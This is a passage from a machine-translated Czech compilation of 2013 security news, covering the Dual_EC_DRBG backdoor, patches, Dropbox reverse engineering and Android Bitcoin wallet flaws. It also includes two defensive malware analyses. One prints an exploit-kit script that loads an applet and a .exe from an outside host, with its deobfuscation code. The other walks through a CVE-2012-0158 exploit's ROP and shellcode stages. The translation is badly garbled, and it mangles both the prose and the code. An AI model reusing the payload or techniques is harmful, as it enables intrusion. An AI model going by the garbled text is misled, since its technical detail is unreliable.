že je to jen první" v tom, co je jistý, že probíhající série útoků proti neopravených zranitelností Java 6. " Naléhá, ​​Java uživatelům buď zakázat, pokud to není nutné, nebo jej aktualizovat na nejnovější verze. Pokud žádná z těchto věcí jsou možné, měly by ostatní aktivní ochrany považovat. Také se obává, že s blížící se odchod do důchodu systému Windows XP , který je předpokládán i nadále používat o 33 procent uživatelů Windows v dubnu 2014 a je v současné době nejčastěji ohrožena verze operačního systému, bude toto sdružení potenciálních obětí ještě větší.


Backdoored NIST odhalen, bude znovu k přezkoumání

12.9.2013 Hrozby | Zabezpečení | Zranitelnosti

Po minulém týdnu zjevení , že NSA, mimo jiné ovlivnila Americký národní institut pro standardy a technologie (NIST) přijmout standard šifrování, který byl učiněn NBÚ zahrnovat slabost znají jen oni, NYT neodhalil že dotyčná norma je NIST Special Publication 800-90.

Přijato organizace v roce 2006, byl standard zřejmě autorem téměř výhradně kryptografické odborníky NSA, a zahrnuje čtyři deterministický Náhodné Bit generátory, mezi nimiž je jeden tzv. Dual_EC_DRBG, který by měl vytvářet náhodná čísla klíče osiva šifrování, ale jak se ukázalo, náhodné Čísla produkuje mají malé zkreslení. To nepřijde jako šok pro odbornou cryptographer Bruce Schneier, ani jeho kolegové Dan Shumow a Niels Ferguson, který v roce 2007 publikoval výzkum popisovat chybu a teoretizování, že to je úmyslné zadní dveře.

Na čas byl Schneier zmateni tím, proč NSA byl tak neústupný, o zařazení tohoto generátoru v normě. "To nedává smysl jako poklop: Je to veřejná, a dosti zřejmé Nemá smysl z technického hlediska:. to příliš zpomalit pro každého, kdo dobrovolně používat, a to nedává smysl z hlediska kompatibility zpětně:. Výměna jednoho generátor náhodných čísel pro jiného je snadné, "poznamenal, a doporučil, aby nikdo používat. Podle New York Times, standardní byl nejen přijat NIST, ale podle Mezinárodní organizace pro normalizaci a Kanady Communications bezpečnostního establishmentu, stejně.

NIST reagovala na odhalení tím, že "by nebylo úmyslně oslabit šifrovací standard" a že by i nadále své poslání " pracovat s kryptografickým společenství vytvořit co nejsilnější šifrování normy pro americkou vládu a průmysl jako celek. " "NIST má za sebou dlouhou historii rozsáhlé spolupráce s předními světovými kryptografie odborníků na podporu robustní šifrování. National Security Agency (NSA) se podílí ve vývojovém NIST kryptografie procesu, protože jeho uznávanými odborníky. NIST je rovněž vyžadováno zákonem konzultovat s NSA, "jsou dále vysvětleny. Konečně, v gestu dobré vůle a doufá, že se znovu získat některé z důvěry, že ztratily z bezpečnostní komunity, se znovu otevřela veřejnosti komentář období pro zvláštní vydání 800-90A a návrhy odborných publikací 800-90B a 90C-800 tak, aby se veřejnost může prohlédnout a vyjádřit se k normě podruhé. "Pokud jsou nalezeny chyby v těchto nebo jiných NIST standardy, budeme pracovat s kryptografickým společenství řešit tak rychle, jak je to možné ", uzavírají.


Chyba zabezpečení uvedené v roce Sophos Web spotřebiče

Zranitelnosti

Sophos vykázala kombinace vulnerabilties, které mohou být použity k provedení dálkové úrovně oprávnění a získat neoprávněný jedinečný přístup k zařízení. Podrobnosti lze nalézt zde http://www.sophos.com/en-us/support/knowledgebase/119773.aspx.

Je-li automatické aktualizace je povolena oprava by měla být použita bez dalšího zásahu.


Microsoft uvolní 14 bulletiny opravou Office, Windows, IE a NET.

7.9.2013 Zranitelnosti

Zářijový vydání patche oznámení Microsoftu předem úterý se objevila v celé své kráse. Statný 14 bulletinů jsou na obzoru, rozdělen rovným dílem mezi rodinou MS Office a Windows OS záplaty, se špetkou Internet Explorer (IE) a. NET házet do pro chuť. Existuje pět návěstí označeny jako kritické, nejvyšší hodnocení Microsoftu. Všechny z nich se bude důležité, subjektivní nasazení různých verzí systému Windows ve vašem prostředí. Jeden z nich bude měsíční IE aktualizace, což je vždy důležité pro ty, kteří dosud přešel k lepšímu prohlížeči. Všechny verze IE vyžadují tuto aktualizaci. Z dalších čtyřech důležitých bulletinů, až na jednoho, IE bulletiny čtyři a pět vyskočit jako zejména co se týče, zejména čtyři, která se vztahuje pouze na XP a 2003. Je zajímavé, že pět bulletin se vztahuje na Windows Vista a 2008, ale Windows 7 nebo novější. Každá z nich by mohla být wormable problém, i když pravděpodobně nebude ve výchozí konfiguraci. Pokud používáte Microsoft těžký obchod a významně investovaly do technologií back office SharePoint a všechny jeho slavné služeb, pak tento měsíc bude velmi práce pro vás. Existuje spousta záplat nasadit, z nichž mnohé jsou vysoce rizikové. Kancelářské chyby jsou obvykle zmírňuje tím, že vyžadují, aby uživatel komunikovat s něčím škodlivým, a to buď prostřednictvím připojení, nebo odkaz, aby mohly být využity. Ale s Office SharePoint Server (), která Stupeň zmírnění může odejít a dalších faktorů obrany v hloubce přijde do hry. Autor: Ross Barrett, Senior Manager, Bezpečnostní technika, Rapid7


Vývojáři pronikli do DropBoxu a ukázali cestu k datům uživatelů

Bezpečnost DropBoxu není 100%, lze obejít i jeho dvoufázové ověřování a vstoupit do komunikace SSL mezi servery DropBoxu.

Hacking | Zranitelnosti

V rámci konference USENIXU 2013 byl uveřejněn článek dvou vývojářů zaměřený na techniky překonávající zabezpečení DropBoxu. Podle autorů jsou „tyto techniky poměrně obecné a věříme, že v budoucnosti pomohou vývoji softwaru, testování a dalšímu výzkumu problémů bezpečnosti.“

DropBox, který má dnes více než 100 milionů uživatelů, kteří nahrávání více než miliardu souborů denně, prohlašuje, že článek neukázal na žádnou konkrétní zranitelnost jeho serverů.

Podle mailu, který zaslal tiskový mluvčí společnosti redakci amerického Computerworldu: „Oceňujeme příspěvky výzkumníků a vůbec všech, kteří pomáhají udržovat DropBox bezpečným. V konkrétním případě, který byl uveřejněn, by muselo nejprve dojít k průniku do počítače uživatele tak, že by byl zneužitelný celý, nikoli pouze pro účet DropBoxu.“

Oba autoři textu, Dhiru Kholia, (z projektu Openwall) a Przemyslaw Wegrzyn (CodePainters) tvrdí, že se jim podařilo pomocí reverzního inženýrství získat zdrojový kód DropBoxu, jehož aplikace byla napsaná v jazyce Python. „Naše práce ukazuje interní API používaná klientem Dropboxu a umožňuje jednoduše napsat vlastní, přenositelnou verzi klienta. Dále předvádíme, jak lze obejít dvoufázové ověřování DropBoxu a jak získat přístup k datům uživatele. Jde o novou obecnou techniku, jak analyzovat aplikace napsané v Pythonu, která se neomezuje pouze na produkty DropBoxu.“

V publikovaném textu se dále detailně popisuje, jak byli autoři schopni rozbalit, rozšifrovat a dekompilovat DropBox. Samozřejmě, jakmile je k dispozici vlastní verze zdrojového kódu, lze dále studovat, jak aplikace funguje. Výsledkem je schopnost získávat data z tunelu SSL, kterým komunikuje klient DropBoxu, ale daná metoda byla úspěšně otestována i na dalších komerčních řešeních.

Použita byla takzvaná monkey-patch, což je metoda rozšiřování nebo modifikace spuštěného kódu interpretovaných jazyků beze změny původního zdrojového kódu. V tomto případě konkrétní implementace dokázala upravit chování klienta DropBoxu, aniž by tento klient dokázal zjistit průnik do vlastního kódu nebo odesílaných dat.

„Doufáme, že naše práce bude inspirovat komunitu věnující se bezpečnosti IT, aby napsala vlastního klienta pro službu DropBoxu, s otevřeným zdrojovým kódem, který by pomohl i vlastní platformě DropBoxu a jejím uživatelům. Doufáme, že na naši práci navážou další výzkumy i pro jiná cloudová úložiště.“


Anti-dekompilace techniky v škodlivým aplety Java

Hacking | Zranitelnosti

 Krok 1: Jak to začalo Když jsem vyšetřoval případ Trojan.JS.Iframe.aeq (viz blogpost <http://www.securelist.com/en/blog?weblogid=9151>) jeden ze souborů klesl o Exploit Kit byl Applet využití Zranitelnost:

<script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Krok 2: První analýza Takže v podstatě jsem rozepnul. Nádobu a se podívat pomocí JD-GUI, dekompilaci java. Jednalo se o výsledné třídy uvnitř jar soubor.:

Názvy tříd jsou divní, ale nic neobvyklého. Obvykle Manifest uvádí vstupní bod (hlavní třída), v appletu. V tomto případě nedošlo k žádnému zjevnému, ale my jsme mohli vidět v appletu volání z HTML:

< applet Archiv = "dyJhixy.jar" code = "QPAfQoaG.ZqnpOsRRk" > << balíček a třída vykonat < param hodnota = "http://

Třetí parametr byl. Exe, že applet klesá. Nebylo skutečná potřeba prozkoumat některou hlouběji jen proto, aby získali přehled o tom, co dělá applet. Nicméně bod, zde bylo analyzovat chybu, která toto. Jar využije.

Na tomto místě bych měl říci, že jsem zaujatý. Četl jsem zprávu McAfee o podobné kampaně s použitím stejného Exploit soupravy. V této zprávě se říká, že malware se snížily o tomto HTML uvnitř byla stavebnice CVE-2013 - 0422.

Obvykle je první vodítko, které by mohly potvrdit, to by bylo verdikty z AV dodavatelů, ale tentokrát to nebyl případ:

https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/

Ok, takže se pojďme podívat na rozklad kódu, počínaje vstupním bodu. Můžeme potvrdit, že třída ZqnpOsRRk provádí applet:

Balíček QPAfQoaG; import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk rozšiřuje aplet Ale rychle vidíme, že něco nefunguje. Jména tříd a metod, které jako náhodné řetězce popletl, ale to je čeho se bát. V tomto případě však vidíme, že decompiler ukazuje podivnou "kód":

veřejné ZqnpOsRRk () { (-0.0D); návrat; 1L; 2; 1;} Nebo to není schopen dekompilovat metody třídy přímo a je jen ukazovat jako bytecode komentářů:

public void ttiRsuN () hodí Throwable { / / Byte kód: / / 0: 10 ldc_w / / 3: iconst_4 / / 4: ineg / / 5: iconst_5 / / 6: ineg / / 7: POP2 / / 8: lconst_0 / / 9: POP2 Teď jsem začal přemýšlet, jak špatná je situace? Mohl bych ještě dostat dostatek informací, zjistit, které CVE je využíván tímto. Sklenice?

Čas na nějaké vážné kopání!

Začal jsem se přejmenovat tříd na základě jejich prvních písmen (ZqnpOsRRk do Z, CvSnABr na C, atd.) a aby odpovídaly metody s tím, co jsem si myslel, že dělají. Je to podobně jako jakýkoli RE pomocí IDA.

Tam byla spousta "divné" kódu kolem, který dostal podivné výklady z Decompiler. Rozhodl jsem se odstranit ji uklidit úkolu.

Samozřejmě, že existuje riziko, že bych mohl smazat něco důležitého, ale tentokrát to vypadalo jako mylné interpretaci bytecode, mrtvého kódu a nepoužitých proměnných. Tak jsem odstranil věci jako:

public static String JEeOqvmFU (třída arg0) { (-5), (-2.0F) return 1;} takhle Tam, kde jsem viděl komentoval bytecode (ne rozložit JD-GUI), smazal jsem všechno, ale odkazy na funkce / třídy.

Na konci jsem měl mnohem čistší kód, ale byl jsem velmi znepokojen, že bych mohl chybět důležité části. Například jsem měl postupů, které se právě vrátil NULL, funkce, která jen deklarované proměnné, nepoužité proměnné, atd.

Kolik z toho, jestliže některý, byl součástí expolit a kolik bylo jen špatně vykládáno kód?

Alespoň jsem byl schopný dostat něco užitečného po vyčištění kódu. Byl jsem schopen lokalizovat funkce slouží k deobfuscate řetězce:

public static String nwlavzoh (String mbccvkha) { byte [] = arrayOfByte1 mbccvkha.getBytes (); byte [] = new byte arrayOfByte2 [arrayOfByte1.length]; for (int i = 0; i <arrayOfByte1.length, i + +) arrayOfByte2 [i] = ((byte) (arrayOfByte1 [i] ^ 0x44)); return new String (arrayOfByte2); } Ne tak docela věda. Teď jsem mohl překládat všechny řetězce, ale já jsem ještě neměl jasnou představu o tom, co se děje v tomto. Sklenice.

Krok 2: Různé strategie Vidět, že kód nebyl správně rozložit jsem si vzpomněl, že zjistit, které zranitelnost je využívána nemáte opravdu potřebují plně předmětem rozkladu kód. Nalezení správné stopy lze odkázat vás na správnou exploitu. Na tomto místě bych si myslel, že by to mohlo být CVE-2013-0422, tak jsem se rozhodl získat další informace o této chybě, a uvidíme, jestli bych mohl najít něco v kódu potvrdit.

Tento CVE byl objeven v lednu 2013. Oracle měl špatný čas jen tehdy, a krátce nato několik dalších Java chyby byly vystaveny.

Stáhnul jsem si několik ukázek z VirusTotal s tímto CVE. Všichni byli snadno rozložit a viděl jsem několik způsobů, jak implementovat tuto chybu zabezpečení. Ale tam byl žádná velká stopa.

Rozhodla jsem se také vyzkoušet několik dalších dekompilátory, ale pořád ještě žádné výsledky.

Nicméně, když se vezme druhý pohled na výsledky běží dnes zastaralé JAD jsem viděl, že dekompilován kód byl docela odlišný od jednoho z JD-GUI, i když to bylo stále neúplné a nečitelné.

Ale byly tam různé hovory s popletl strun deobfuscation funkce.

Applet používá zavaděčem tříd s popletl řetězce, aby se zabránilo odhalení, takže je obtížné vědět, co je nakládání bez správně rozložit řetězce. Ale teď jsem měl všechny z nich!

Po spuštění skriptu jsem:

com.sun.jmx.mbeanserver.JmxMBeanServer newMBeanServer javax.management.MbeanServerDelegateboolean getMBeanInstantiator findClass sun.org.mozilla.javascript.internal.Context com.sun.jmx.mbeanserver.Introspector createClassLoader Teď to bylo mnohem jasnější a dobře znám. Měl jsem jiný pohled na jeden z PDF Zrovna jsem četl a bingo!

https://partners.immunityinc.com/idocs/Java% 20MBeanInstantiator.findClass%% 200 dnů 20Analysis.pdf

Tak konečně jsem mohl potvrdit CVE skutečně CVE-2013-0422.

Krok 3: Proč ne Java Decompiler práci? V těchto případech je vždy možné přijmout jiný přístup a udělat nějaké dynamickou analýzu ladění kódu. Pokud chcete jít touto cestou doporučuji přečtení pro nastavení:

http://blog.malwarebytes.org/intelligence/2013/04/malware-in-a-jar/

Nicméně, nemohl jsem přestat přemýšlet o tom, proč jsou všechny dekompilátory nepodařilo s tímto kódem. Pojďme se podívat na rozklad bytecode ručně. Můžeme snadno dostat to takhle:

javap-c-classpath LOCAL_PATH ZqnpOsRRk> ZqnpOsRRk.bytecode

Pojďme se podívat na kód, který jsme dostat a co to znamená, s okem na rozklad kódu. Budeme potřebovat:

http://en.wikipedia.org/wiki/Java_bytecode_instruction_listings

veřejnosti . QPAfQoaG ZqnpOsRRk ( ) , kód : 0 : aload_0 1 : invokespecial # 1 ; / / Metoda java / applet / applet "<init>.": () V 4 : dconst_0 << tlak

a dekompilován kód s příslušnými návody čísel:

public class ZqnpOsRRk rozšiřuje Applet { public ZqnpOsRRk ( ) { ( - 0.0D ) ; návrat ; 1L ; 2 ; 1 ; }

Tak můžeme vidět, jak metoda, která právě zajišťuje návratnost ponechává hodně smetí ve středu. Decompiler nemůže zvládnout a snaží se interpretovat všechny tyto operace, tyto anti-rozkladu artefakty. To jen přidává spoustu extra hluku do konečných výsledků. Můžeme bezpečně odstranit všechno.

public class ZqnpOsRRk rozšiřuje Applet { public ZqnpOsRRk ( ) { return ; }

Existují tuny těchto artefaktů v bytecode. Zde je několik příkladů:

1: lconst_0 2: lneg 3: pop2 1: iconst_5 2: ineg 3: iconst_1 4: ineg 5: pop2 1: iconst_5 2: ineg 3: iconst_5 4: swap 5: pop2 Existuje také spousta nesmyslných skoky, jako je Push NULL pak skočit pokud GOTOS NULL a NOP.

V podstatě je to těžké odstranit tyto konstruktory od bytecode, protože parametry jsou odlišné a ne vždy hodit do stejné opcodes. Je to až k Decompiler, jak se zbavit tohoto mrtvého kódu.

Po několika hodinách Ruční čištění kódu a rekonstruovat z bytekódu mohl jsem konečně přečetl výsledek a porovnat jej s původním rozklad jednoho. Teď jsem pochopil, co se děje a co se stalo s původním kódem jsem mohl bezpečně odstranit mrtvé kód a zavést čitelné názvy tříd a metod.

Ale je tu ještě jedna nezodpovězená otázka: Proč byl první decompiler schopen deobfuscate všechny řetězce, a proč jsem musel použít JAD dostat všechno, co?

JD-GUI vrátí bytecode metod, které nelze dekompilovat, ale pro instrukce jako nejméně rozvinuté země (který dává konstantní do zásobníku), nezahrnuje konstanta spolu s instrukcí ve výstupním kódu. To je důvod, proč jsem se nemohl dostat, dokud jsem použil druhý dekompilátor. Například:

JD - GUI výstup : / / 18: LDC 12 Bytecode výkon : 18 : LDC # 12 ; .! / / String "+) J71 * j) <j) &% * 7 62 6j ^ N) <t ^ F !% * ^ W 62 6! JAD výstup : třída 1 = . ClassLoader loadClass ( . CvSnABr nwlavzoh ( !! '. "+) J71 * j) <j) &% * 7 62 6j16) <t06% * 27 ! 62 6 "! ) ) ;

V bytecode, šťastně, můžeme najít všechny tyto odkazy a dokončit práci.

Závěrečné myšlenky Když jsem pracoval v tomto binárním Vzpomněl jsem si na prezentaci v BH 2012 o anti-rozklad technik používaných pro Android binárky. To bylo poprvé, co jsem osobně narazil na binární Java provádí něco podobného. Ani oni nejsou tak těžké, aby se zabránilo, analýza je mnohem pomalejší, a to může být opravdu těžké rozluštit velké binární soubory.

Takže tam jsou dvě otevřené otázky: za prvé, co se dá dělat, z dekompilátor pohledu, aby se zabránilo tyto triky? Doufám, že se o tom poradit s autory JD-GUI.

Za druhé, jak můžeme zapsat kód "undecompilable"? Existují automatické nástroje, je to tak? Opět doufám, že se dozvědět více, ale prosím, kontaktujte mě, jestli máte něco užitečného na akcii.


Kuriózní případ CVE-2012-0158 využít

Zranitelnost

CVE-2012-0158 je přetečení vyrovnávací paměti v ListView / TreeView ovládací prvky ActiveX v knihovně MSCOMCTL.OCX. Škodlivý kód, může být vyvolána speciálně vytvořený DOC nebo RTF souboru pro MS Office verze 2003, 2007 a 2010. Ačkoli tato chyba zabezpečení byla oprava společnosti Microsoft více než před rokem, zdá se, že ne každý se staral o instalaci aktualizací. A ti, kteří ne, může být riziko, jak se dostat všechny své dokumenty, obrázky a databáze šifrované pomocí nové verze Gimemo ransomware (detektor našich výrobků Trojan-Ransom.Win32.Gimemo.beic).

Vzhledem k tomu, binární se stále analyzuje, v tomto článku se zaměříme pouze na dodání dílu. I když exploit není zero-day, je to docela zajímavé, protože na složitosti kódu (to se skládá ze 4 fází!) A jednoduchý ale efektivní anti-heuristických technik, které používá.

Ransomware je zrušen a probíhá pomocí škodlivého souboru RTF ("Указ Президента от 12.06.2013.doc", který překládá k "prezidentským dekretem 12.06.2013.doc"), připojené k hromadně posílaných zpráv. Vypuknutí Zdá se, že došlo dne 18. června 2013, kdy Kaspersky Security pro Mail Server Linux zjištěny stovky takových zpráv jako nebezpečný (jejich identifikaci jako Exploit.Generic.Dropper.a). Zatím se zdá, že pouze rusky mluvící uživatelé jsou cílené a většina e-mailů Viděli jsme byli posláni z IP adresy v Německu, s hlavičkou, který je stejný nebo podobný tomuto:

"Přijata: od bersar o 24-host.com s místními (Exim 4.69) (obálky z <admin@24-host.com>) id"

Soubor RTF obsahuje tři vložené objekty. První z nich je balíček se skládá z 12-byte podpisu a škodlivého binární následuje poslední (čtvrtý) stupeň shell kód (oba "zašifrované" s XOR 0x9D).

Tento podpis je používán později jevištní 3 shell kód najít zbytek shell kód a binární v paměti.

Druhý objekt je objekt OLE - který obsahuje chybně DOC soubor, který spouští přetečení vyrovnávací paměti a spustí shell kód. Vložení tohoto dokumentu pomocí propojování a vkládání objektů technologie znamená, že ve zdroji původního souboru RTF uvidíme ASCII reprezentace škodlivého hexadecimálním kódu, spíše než hex kód sám. Jedná se o primitivní technika, která může mít za následek vynechání některé jednoduché heuristické mechanismy. Dále malware spisovatel také postaral poplést všechny konstantních hodnot, které se používají při zpracování ListView ovládací prvek ActiveX. Podstatou bylo vnést držáky a bílých znaků na těchto hodnotách, což je těžší rozpoznat, zatímco oni jsou úplně ignorovány při zpracování OLE složeného dokumentu.

Pokud se otevře nebezpečný RTF soubor v hex editoru, že to není tak snadné rozpoznat kód exploitu na první pohled. Ale jakmile jsme zjistili, umístění ListView CLSID, věci se trochu jednodušší. Ale nemá smysl hledá nejoblíbenější Exploit opcodes, jako 0xEB (JMP instrukce) nebo 0xE8 (instrukce call), tuto chybu má za cíl vyšší. Za prvé se snaží obejít Zabránění spuštění dat pomocí řetězu ROP vycházet z pokynů z zranitelné verze knihovny MSCOMCTL.OCX. Za druhé, používá FLDZ + FSTENV instrukce, jak získat ukazatel instrukcí, který je starý, ale docela neobvyklé techniky a může přehlédnout, zvláště pokud obklopena některé falešné, legitimně vyhlížejících matematických operací.

ROP (Return orientovaného programování) je metoda, kterou vynalezl před pár lety proti Zabránění spuštění dat. Místo toho, aby přímo spustit kód v paměti, které by mohly být označeny jako non-spustitelný, exploit využívá vhodných sekvencí instrukcí, které z jedné sdílené knihovny, za předpokladu, že tato knihovna byla načtena do paměti na adresu předvídatelným. V tomto případě, je navržen tak, aby řetěz ROP přidělit místo na hromadu, zkopírujte druhou etapu shell kód ze zásobníku do tohoto spustitelného paměti a jednoduše říkat.

Druhá část shell kód je popletl se spoustou nevyžádané instrukcí, které nemají významný vliv, ale jsou zde oklamat heuristiky a brání analýzy. Když jsme se vyloučit tyto nesmyslné pokyny (označené "-----", komentář na obrázku níže), můžeme jasně vidět, že tato část je zodpovědná za dekódování třetí fáze shell kódu. Opět platí, že dešifrování rutina je velmi jednoduché - stačí XOR s 0x3D.

Další část kódu implementuje techniku ​​zvanou "vejce lov" najít a spustit finální užitečné zatížení. Co stojí za povšimnutí zde je, že exploit neobsahuje žádné struny, nebo dokonce hash, které by mohly být easlily identifikovány jako podezřelý. Namísto toho používá název délku najít knihovnu kernel32.dll základnu, a rozdíl mezi prvním a druhým DWORD jména najít IsBadReadPtr API.

Jak již víme, jsou ve fázi 4 shell kód a škodlivý binární nachází v první objekt OLE dokumentu ve formátu RTF. Kontrolou následné paměťové bloky s IsBadReadPtr () funkce, exploit identifikuje všechny oblasti paměti, že současný proces je schopen číst. Pak vyhledá prostřednictvím těchto čitelnými bloků pro pořadí bajtů, které se shoduje s podpisem na začátku šifrované škodlivý balíček. Po dešifrování rutina exploit alokuje část paměti na haldě zkopíruje stage 4 shell kód do něj uloží ukazatel na dešifrovaného MZ a skočí na rutinu, která provádí skutečný pokus odstranit a provést binární.

Poslední část shell kódu klesne binární do% TEMP% \ WINWORD.EXE a odstraní klíče registru, které MS Word používá k ukládání informací o souborech, které by mohly potřebovat zotavení. Pak se používá WMI rozhraní WMI (zkratka pro Windows Management Instrumentation) konečně spustit MZ souboru. Proč útočníci používají WMI není zatím jasné. Neviděli jsme tuto techniku ​​v hrdinských činech velmi často.

Přestože shell kód obsahuje dlouhý seznam IIDs a CLSID vztahující se k jiným WMI rozhraní, pouze využívá IWbemLocator rozhraní. Účelem zbytek z nich není znám. Je možné, že malware spisovatel uvedené v tomto seznamu v shell kódu jen poplést, nebo možná, že jsou používány v určitém okamžiku by škodlivý binární.

Shrnutí

Tento konkrétní příklad zneužití není opravdu vymýšlet nic nového a techniky, které používá jsou buď staré nebo velmi jednoduché. Nicméně, toto množství zmatku a anti-heuristických triky je poněkud působivý v jednom souboru:

vícevrstvý objekty OLE držáky + bílých znaků zmatek ROP řetězce obejít DEP FSTENV pokyn, aby se EIP nevyžádané návod XOR zmatek vejce lov technika neobvyklé hash rutina jména API použití WMI spouštět binární Seznam nevyužité WMI UID Malware spisovatelé se hodně úsilí, aby se zabránilo odhalení, ale zdá se zaměřili na systémech s některé konkrétní konfigurace a / nebo běží nějaký zvláštní AV software. Tam byl omezený počet cílů, z nichž většina vychází na Ukrajině. Kaspersky Security pro Mail Server Linux zjištěno několik stovek infikovaných zpráv - všechny byly odeslány během prvního dne ohniska. Na druhou stranu, naše show KSN údaje, které od června 18 a 30 července, byl pouze 55 detekcí Trojan-Ransom.Win32.Gimemo.beic, a to výhradně na Ukrajině. Od 31.července jsme byli svědky stejné (nebo velmi podobné) exploit, pád různé binární (detekován jako Trojan-Spy.Win32.Zbot.nxdk). Budeme se tímto případem zabývali a udržet si aktualizovat. Do té doby, ujistěte se, že jste nainstalovali všechny dostupné bezpečnostní záplaty. I když v tomto případě se jedná o relativně malé cíleného útoku, další CVE-2012-0158 využívá stále velmi rozšířený a používají zločinci k poklesu stovky různých škodlivých souborů.


Google přináší patch pro Android SecureRandom provedení

Publikováno dne 16. srpna 2013. Mobil | Zranitelnosti

Bezpečnost Android inženýr opět potvrdil existenci zranitelnosti, která dělala nejpopulárnější Bitcoin aplikace peněženka pro platformu otevřenou k útoku, a nabídl pomoc pro vývojáře. Jako připomínka: chudí Android implementace Java SecureRandom třídy vynaložila veškeré soukromé klíče generován na zařízení se systémem Android slabé a snadno rozluštit útočníky. Jako každá transakce Bitcoin musí být podepsána soukromým klíčem spojené s Bitcoin adresu osoby, která hodlá převést peníze, je snadné vidět, jak věděl něčí kryptografický soukromý klíč může dovolit škodlivé jednotlivci Vyprázdnění osoby peněženku. "Nyní jsme zjistili, že aplikace, které používají Java Cryptography Architecture (JCA) pro generování klíčů, podepsání nebo generování náhodných čísel nemusí obdržet kryptograficky silné hodnoty na zařízeních se systémem Android v důsledku nesprávné inicializaci základní PRNG, "vysvětlil v blogu. "Aplikace, které se přímo odvolávat na systému OpenSSL PRNG pokud bez výslovného inicializace systému Android jsou také ovlivněny. Žádosti, které stanovují TLS / SSL spojení pomocí HttpClient a java.net třídy nejsou ovlivněny jako ty třídy se semene na PRNG OpenSSL s hodnotami z / dev / urandom . Vývojáři, kteří používají JCA pro generování klíčů, měl by podpis nebo generování náhodných čísel aktualizovat své aplikace explicitně inicializovat PRNG s entropií z / dev / urandom nebo / dev / random . " On také zahrnovala navrhované provádění v blogu, a potvrdil, že Google vyvinula opravy, které zajistí, že Android je OpenSSL PRNG je správně inicializován a zaujal ty patche otevřít partnery Handset Alliance. Bitcoin Nadace rovněž aktualizován svůj původní příspěvek upozorňující uživatele Problém by potvrdil, že Bitcoin Wallet, BitcoinSpinner, Mycelium Bitcoin Wallet a blockchain.info aplikace byly aktualizovány tak, aby tento problém vyřešit. Mají také instrukce pro uživatele, co dělat poté, co stáhnout a nainstalovat tyto nejnovější verze, nebo v případě, že nemohou aktualizovat své aplikace pro Android.


Počítačoví zločinci "šetřit" vlnu útoků Windows XP, kdy Microsoft přestane podporovat
Napsal: 12.08.2013 22:58 PDT
Zranitelnosti | Hrozby
Počítačoví zločinci se rozpoutá vlnu "zero-day" zranitelnosti k útoku na systém Windows XP stroje po 08.04.2014, bezpečnostní expert prohlásil. Microsoft se zastaví uvolněním aktualizace zabezpečení pro operační systém k tomuto datu.

Zločinci budou "sedět" těchto chyb až do uvedeného data, aby více peněz ze svých činů, v souladu s Jasonem Fossen vzdělávacích SANS bezpečnostní firmy.

V současné době jsou chyby opravené Microsoft. Po dubnu se pouze společností, které platí pro vlastní podpory může být chráněn - a až třetina organizací se očekává, že i nadále používat systém Windows XP stroje.

"Průměrná cena na černém trhu za zneužití systému Windows XP je 50.000 dolarů 150.000 dolarů - relativně nízká cena, která odráží Microsoft odpověď," řekl Fossen, mluví k ComputerWorld.

"Když někdo zjistí, velmi spolehlivý, vzdáleně spustitelného XP zranitelnosti, a publikuje dnes, bude společnost Microsoft záplatu během několika týdnů. Ale když sedí na zranitelnosti, cenu za to mohlo velmi dobře double. "

Fossen práce je založena na stále značného počtu osobních počítačů používajících systém Windows XP.

Windows XP, který vyšel v roce 2001, je stále druhý nejvíce populární verze Windows - 38,7% osobních počítačů používaných XP od druhého čtvrtletí letošního roku, podle NetMarketShare.

ComputerWorld se předpokládá, že 33 - 34% bude stále spustit operační systém, kdy Microsoft přestane oprav to. To je v ostrém kontrastu, Fossen říká, na nízká čísla v prostředí Windows 2000, když to bylo vysloužilé v červenci 2010 - čtyři desetiny z 1%, v závislosti na monitorování pevných Net Applications. Dokonce tak, tam byly zprávy s nulovými dnů zaměřených na systém Windows 2000, kdy odešel do důchodu, podle zprávy Computerworld.

Výzkum Camwood, britský poradenství v oblasti softwaru, našel již dříve v tomto roce jen 42% firem se systémem Windows XP začali proces migrace.

Společnost Microsoft doporučuje ponechat alespoň 18 měsíců migrovat. Jeden z pěti IT dotázaných uvedla, že mají v úmyslu pokračovat v používání operačního systému, přestože si byli vědomi rizik.

ESET podcast nabízí některé nové bezpečnostní tipy pro stárnoucí OS zde.

Postu Počítačoví zločinci "šetřit" vlna Windows XP napadne, když Microsoft přestane podpora poprvé objevil na Žijeme zabezpečení.


Bitcoin peněženky "v ohrožení", díky Android chyby zabezpečení
Napsal: 12.08.2013 12:04 PDT
Mobil | Hacking | Zranitelnosti
Bezpečnostní chyba opustil všechny Bitcoin peněženky na Android náchylné k odcizení, Bitcoin.org varoval.

Tato chyba zabezpečení se týká všech Bitcoin peněženky na Android plaform a Bitcoin.org reccomends, že všichni uživatelé navštívit Google Play úložiště k instalaci aktualizace, jakmile budou k dispozici jeden. Některé aplikace již byly aktualizovány, ale některé ne. Bitcoin.org neučinil žádné prohlášení o tom, zda všichni uživatelé mají ztracených kvůli zranitelnosti.

"Nedávno jsme se dozvěděli, že součástí Android odpovědné za generování náhodných čísel zabezpečených obsahuje kritické nedostatky, které je činí vše Android peněženky vytvořené k dnešnímu dni ohroženy krádeží," Bitcoin.org uvedl v prohlášení.

"Vzhledem k tomu, že problém je s operačním systémem Android sám, tento problém bude mít vliv na vás, pokud máte peněženku vytvořený jakýmkoliv aplikace pro Android. Aplikace, kde nemáte kontrolu soukromých klíčů vůbec nejsou ovlivněny. Například, výměna přední díly jako Coinbase nebo MT GOX apps nejsou ovlivněny tento problém, protože soukromé klíče nejsou generovány na vašem telefonu Android. "

